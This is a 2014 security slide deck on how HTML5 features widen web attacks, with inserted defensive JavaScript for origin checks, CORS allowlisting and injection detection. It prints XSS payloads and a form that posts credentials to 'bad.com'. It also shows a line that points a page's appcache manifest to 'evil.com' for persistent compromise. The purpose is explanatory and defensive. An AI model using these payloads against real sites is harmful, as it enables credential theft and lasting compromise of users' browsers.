Securing & Accelerating Your Applications 1/29/2014 Deny All © 2012 1 1/29/2014 Deny All © 2013 1
HTML5
a clear & present danger
Renaud Bidou
CTO
Menu
1. HTML5 new capabilities
2. HTML5 tricks
3. Empowering common threats
4. Hackers’ dreams come true
What’s new with HTML5
HTML5 short history
• Project led by W3C
• Latest draft: HTML 5.1 – May 2, 2013
– Previous: December 17, 2012
– Previously: 13 drafts starting from January 22, 2008
• Why HTML5?
– Make HTML content natively dynamic
– Support offline mode
– Increase security control and tuning
– Improve internals for performance, task parallelization etc.
New HTML content
• On-the-fly graphics with the <canvas> tag
• Native MP3, Ogg and Wav audio format support with the <audio> tag
• Native MP4, WebM and Ogg video format support with the <video> tag
• Drag & Drop! with the draggable attribute and the ondrop event handler
• Embedded geolocation with the new getCurrentPosition() method
Input Validation
• New input types through the <input type> attribute
– Email: type="email"
– URL: type="url"
– Numbers: type="number", type="range"
– Date: type="date", type="month", type="week"
• Embedded format validator
– Based on the type attribute value
– Can be enforced through the pattern attribute
– Can be disabled… don’t try to understand…
<form novalidate>
New forms inputs
<input type="email">
<input type="url">
<input pattern="\d{4}" placeholder="4 digits PIN">
<input type="number" min="0" max="10" step="2" value="6">
New HTML internals
• Web Workers enable JavaScript background processing
• Web Storage improves local storage to extend the cookie concept and natively support session-based data handling
• WebApp Cache enables offline mode for Web/Cloud based applications
• Server-Sent Events (SSE) enable Server to Client communication through the established connection
HTML5 new security tricks
iFrame Sandboxing
• iFrame sandboxing
– forbids forms, scripts, popups, access to cookies and local storage
– considers the content as being provided by another domain
• iFrame sandboxes are not set by default
– Backward compatibility
– sandbox attribute to be explicitly set, without value
<iframe src="iframe-source.html" sandbox="">
Not natural at all
Cross-document messaging
• Cross-document messaging
– provides a mechanism for iframes to communicate with the parent document
– overrides HTML4 restrictions
• Implementation failure
– Parent frame is expected to control the sources of messages
– Rarely (never) performed
– Origin iframe identification not even enforced
window.parent.postMessage('hello', '*');
The second argument ('*') is the origin iFrame ID: wildcards are valid & recommended
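As an added example (not code from the slides), this is what the missing control on the parent side looks like: a receiver that checks event.origin against one trusted origin, and a sender that refuses the '*' target. The origin https://app.example is an assumed value, and the events are constructed so the code runs without a DOM.

```javascript
// Added example: origin-checked cross-document messaging (not from the slides).
const TRUSTED_PARENT = "https://app.example"; // assumed deployment origin

// Build a message handler that only accepts messages from one origin.
// Everything else is dropped and counted, never acted upon.
function makeMessageHandler(trustedOrigin, onMessage) {
  const stats = { accepted: 0, rejected: 0 };
  function handler(event) {
    // event.origin is filled in by the browser; the sender cannot forge it.
    if (event.origin !== trustedOrigin) {
      stats.rejected += 1;
      return false;
    }
    // Treat the payload as structured data, never as code or HTML.
    if (typeof event.data !== "object" || event.data === null) {
      stats.rejected += 1;
      return false;
    }
    stats.accepted += 1;
    onMessage(event.data);
    return true;
  }
  handler.stats = stats;
  return handler;
}

// Sending side: name the concrete target origin instead of '*', so the
// browser drops the message if the target window has navigated elsewhere.
function sendToParent(parentWindow, payload, targetOrigin) {
  if (targetOrigin === "*") throw new Error("refusing wildcard targetOrigin");
  parentWindow.postMessage(payload, targetOrigin);
}

// Constructed events standing in for what a browser would deliver.
const received = [];
const onMessage = makeMessageHandler(TRUSTED_PARENT, (d) => received.push(d));
onMessage({ origin: "https://app.example", data: { type: "resize", h: 300 } }); // accepted
onMessage({ origin: "https://evil.example", data: { type: "resize", h: 1 } });  // wrong origin
onMessage({ origin: "https://app.example", data: "<script>" });                  // not an object
```

In a page, `window.addEventListener("message", onMessage)` wires the handler in; the stats counter is what you would export to monitoring.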
iFrame insecurity
• Sandboxes are not applied
– iFrames provide access to local storage
– iFrames allow script execution and forms
• Thanks to cross-document messaging
– iFrames communicate with the parent window
HTML5 opens doors between iframes and parents
CORS
• Cross-Origin Resource Sharing
• Required for « modern » applications
• Browsers handle 3rd party domain content
[Diagram: an HTML5 powered browser loads the main page from Site A (1), then requests 3rd party content from Site B (2)]
CORS tricky concept
• CORS « security » controls
[Diagram: HTML5 powered browser talking to Site A (1), then to Site B (2)]
1. Browser to Site A:
GET / HTTP/1.1
Host: Site_A
Site A to browser:
HTTP/1.1 200 OK
2. Browser to Site B:
GET /content.htm HTTP/1.1
Host: Site_B
Origin: http://Site_A
Site B to browser:
HTTP/1.1 200 OK
Access-Control-Allow-Origin: http://Site_A
• rely on
– Origin and Access-Control-Allow-Origin headers
– Relevant access control implemented on the server
– Client/Server trust relationship ??????????????
CORS Security Issues
• Access control
– No implementation standard
– Often set at site level through includes, or left universal: Access-Control-Allow-Origin: *
– No reliable access control on the server
• Preflighted requests
– Inform about supported methods
– Define the security policy set on the browser
– Responses are cached on the client: browsers will not update their security policy
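The server-side control the slide says is missing, as an added example (not code from the slides): CORS headers computed from an explicit origin allowlist, echoing the matched origin instead of *, adding Vary: Origin, and keeping the preflight cache short so policy changes reach clients. The origins and the 600-second max-age are assumed values.

```javascript
// Added example: CORS origin allowlisting on the server (not from the slides).
const ALLOWED_ORIGINS = new Set([
  "https://site-a.example",        // assumed
  "https://admin.site-a.example",  // assumed
]);
const PREFLIGHT_MAX_AGE = 600; // seconds; short, so a policy change is not cached for long

// Return the CORS headers for a request carrying `origin`, or null when the
// origin is not allowed; the response then carries no CORS headers at all and
// the browser refuses the cross-origin read.
function corsHeaders(origin, allowed = ALLOWED_ORIGINS) {
  if (typeof origin !== "string") return null; // no Origin header: not a CORS request
  // Exact match only: no substring, prefix or regex matching, which is how
  // "https://site-a.example.attacker.example" would otherwise be accepted.
  if (!allowed.has(origin)) return null;
  return {
    "Access-Control-Allow-Origin": origin,  // echo the matched origin, never "*"
    "Vary": "Origin",                       // one origin's answer must not be cached for another
    "Access-Control-Allow-Methods": "GET, POST",
    "Access-Control-Allow-Headers": "Content-Type",
    "Access-Control-Max-Age": String(PREFLIGHT_MAX_AGE),
  };
}

// Decide status and headers for a preflight (OPTIONS) or an actual request.
function handleCors(method, origin) {
  const headers = corsHeaders(origin);
  if (method === "OPTIONS") {
    // Preflight: 204 with policy for an allowed origin, 403 otherwise.
    return headers ? { status: 204, headers } : { status: 403, headers: {} };
  }
  // Actual request: the resource is served, but without CORS headers the
  // browser will not expose the response to a page from an unlisted origin.
  return { status: 200, headers: headers || {} };
}
```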
The Gig
1. CORS obsoletes SOP
– « Native » browsing on internal networks
– Powerful DoS capabilities
– Accurate network (IP, port) scan behind the firewall
– Etc.
2. iFrames are out of control
Browsers are turned into proxies
Empowering usual attacks
Injections heaven
• 31 HTML5 new tags
– 31 new injection vectors supported by browsers
• 52 + 1 HTML5 new script event handlers
– 52 on* injection points
– + formaction: bypasses on\w+= like filters
<audio> <canvas> <command> <embed> <nav> <param> <source> <ruby> <track> <video> …
<form id="test" />
<button form="test" formaction="javascript:alert(1)">
Thousands of new evasion combinations
Attributes you will love
• Self-triggering execution through autofocus
<input type="text" value="" onfocus="alert(1)" autofocus>
<body onscroll=alert(1)>
<br><br><br><br><br><br>...<br><br><br>
<input autofocus>
• Overwrite user input with dirname
– Can be efficiently combined with appropriate handlers
<form action="" method="post">
<input name="username" value="admin" />
<input name="password" type="password" value="secret" />
<input name="captcha" value="" dirname="password"/>
<input type="submit">
</form>
username=admin&password=ltr&captcha=
Stealth user abuses
Drag&Drop Jacking
• Abusing the D&D API
– Have a user drag & drop something
• Image, text, browser element (scrollbar, slider etc.)
– Set the value of the dragged element to whatever you want
• Malicious data to be submitted on behalf of the user
• Confidential data to be stolen
– Have an invisible element follow the mouse
– Set the ondrop event handler of the iFrame to whatever…
• Feed form content (with malicious data): CSRF
• Send content (stolen data) to a 3rd party: Cross-domain data leak
Bypasses cross-domain & CSRF protections
S’more Clickjacking
• External forms content definition
– Thanks to the form & formaction attributes
– Can also be used to bypass CSRF protections
– Not that subtle, but still smarter than average users…
<form id='auth' action='/login'>
<input type='text' placeholder='login'>
<br><input type='password' placeholder='password'>
<br><input type='submit' value='Enter'>
</form>
<input form='auth' type='submit' value='Enter HERE' formaction='http://bad.com/thanks'>
Trivial data theft & CSRF protections bypass
XSS Unleashed
• Screenshots with XSS
– Thanks to the <canvas> tag…
[Diagram: Hacker, Vulnerable App, Victim Browser, Relay]
1. Hacker exploits XSS vulnerability
2. Malicious Javascript is loaded on Victim
3. Victim executes Javascript
4. Victim sends screenshot
5. Hacker retrieves screenshot
BotnetNG
• Bi-directional communication channel
– Server-Sent Events to change web-based botnets’ behaviour
• Past:
– Agent regularly connects to the C&C channel
• to get commands and provide output
• « Easy » to identify and sign
– Threat flows from inside out
• Efficiently addressed with outgoing proxies
• Now:
– No recurring connections to the C&C channel
• Commands sent by the server / responses sent asynchronously
• No standard behaviour to model
– Threat flows from outside in
• Not addressed by web client security devices
Botnet prevention mechanisms are obsolete
HTML5 Inside
Password cracking
• A botnet case study
– Targets clients connected to a compromised application
– Used to crack passwords
• Takes advantage of Web Workers
– Browsers compute hashes in the background
– Invisible to the user, no impact on browser performance
• Just theory?
– Ravan, Distributed JS Computing Systems
– Supports MD5 and SHA hashes
– Simply a PoC, users are asked for permission
Web hackers’ version of distributed computing
Dream comes True
• Issues with injections
– Volatile: limited timeframe
– Persistent: can be removed from the compromised DB
• The Hacker’s dream
– Persistent injections for an unlimited timeframe
– Client-side persistency to prevent one-shot removal
• WebApp cache: HTML5 gift to the underground
– Local HTML5 storage
– Independent from the browser cache
• Not so easy to clean, whenever possible
– Prevents any request from the client
– Allows caching anything, including the root of the application
WebApp Cache
• Browser requests a page
GET / HTTP/1.1
<!DOCTYPE HTML>
<html manifest="site.appcache">  <!-- Manifest file URL -->
…
</html>
• Browser gets the Manifest file
– Specifies pages to be locally cached
– Some more stuff
• Browser stores the files
– Never to be requested again
The Ultimate APT
• One scenario
– Exploit a client-side injection vulnerability on a server (XSS)
• Can be volatile, will be used just once
– Have the client browser execute something like
document.getElementsByTagName("html")[0].setAttribute("manifest","http://evil.com/bad.manifest");
• Changes the manifest attribute to point to the corrupted manifest file
– Set an entry in the corrupted manifest file to a corrupted file
• with « alternate » capabilities such as phishing or drive-by download
Client access to application compromised forever
Conclusion
HTML5 opens doors between iframes and parents
Browsers are turned into proxies
Thousands of new evasion combinations
Preventing HTML5 abuses
• Identify new HTML5 content
– Tags, attributes, event handlers
• Identify previously defined HTML5 content
– Now removed from recent drafts
– Still supported by browsers
• Evaluate suspicious combinations
– Tag name + attribute + event handler
• Efficiently identify script injections
– Don’t try to understand (you can’t)
– Identify the nature of data submitted to your application
• Enforce access restrictions
– In the core of applications for Cross-Document Messaging
– At the server level for CORS security
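An added example (not code from the slides) tying the "Injections heaven" slide to the prevention list above: an inspector that labels the HTML5 vectors the deck names in submitted data, with formaction tested on its own because an on\w+= filter never sees it. The tag list is only the subset shown on the slide, and the sample submission is constructed from the slide payloads.

```javascript
// Added example: flagging HTML5 injection vectors in submitted data (not from the slides).
const HTML5_TAGS = new Set(["audio", "canvas", "command", "embed", "nav",
                            "param", "source", "ruby", "track", "video"]); // slide subset only

// Return finding labels for one submitted value; an empty list means nothing flagged.
function inspectHtml5Input(value) {
  const findings = new Set();
  // 1. New tags, well-formed or not (no closing ">" required to count).
  for (const m of value.matchAll(/<\s*\/?\s*([a-z][a-z0-9-]*)/gi)) {
    const tag = m[1].toLowerCase();
    if (HTML5_TAGS.has(tag)) findings.add(`html5-tag:${tag}`);
  }
  // 2. Classic on*= handlers, old and new alike.
  for (const m of value.matchAll(/\b(on[a-z]+)\s*=/gi)) {
    findings.add(`handler:${m[1].toLowerCase()}`);
  }
  // 3. formaction carries a URL without any on* handler, so the regex above misses it.
  if (/\bformaction\s*=/i.test(value)) findings.add("formaction");
  // 4. autofocus lets a handler fire with no user interaction.
  if (/\bautofocus\b/i.test(value)) findings.add("autofocus");
  // 5. dirname submits an extra field under a name chosen by the injector.
  if (/\bdirname\s*=/i.test(value)) findings.add("dirname");
  // 6. javascript: URIs in any attribute value.
  if (/javascript\s*:/i.test(value)) findings.add("javascript-uri");
  return [...findings];
}

// Inspect a whole submission: field name -> findings, for flagged fields only.
function inspectSubmission(fields) {
  const report = {};
  for (const [name, value] of Object.entries(fields)) {
    const f = inspectHtml5Input(String(value));
    if (f.length) report[name] = f;
  }
  return report;
}

// Constructed sample submission built from the payloads shown on the slides.
const SAMPLE = {
  comment: "Hello <b>world</b>",
  bio: '<input type="text" value="" onfocus="alert(1)" autofocus>',
  site: '<form id="test" /><button form="test" formaction="javascript:alert(1)">',
  nick: '<input name="captcha" value="" dirname="password"/>',
};
```

The report for `SAMPLE` shows the point of the slide: the `site` field is flagged only by the formaction and javascript-uri rules, never by the handler rule.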
Thank you!
+33 1 46 20 96 00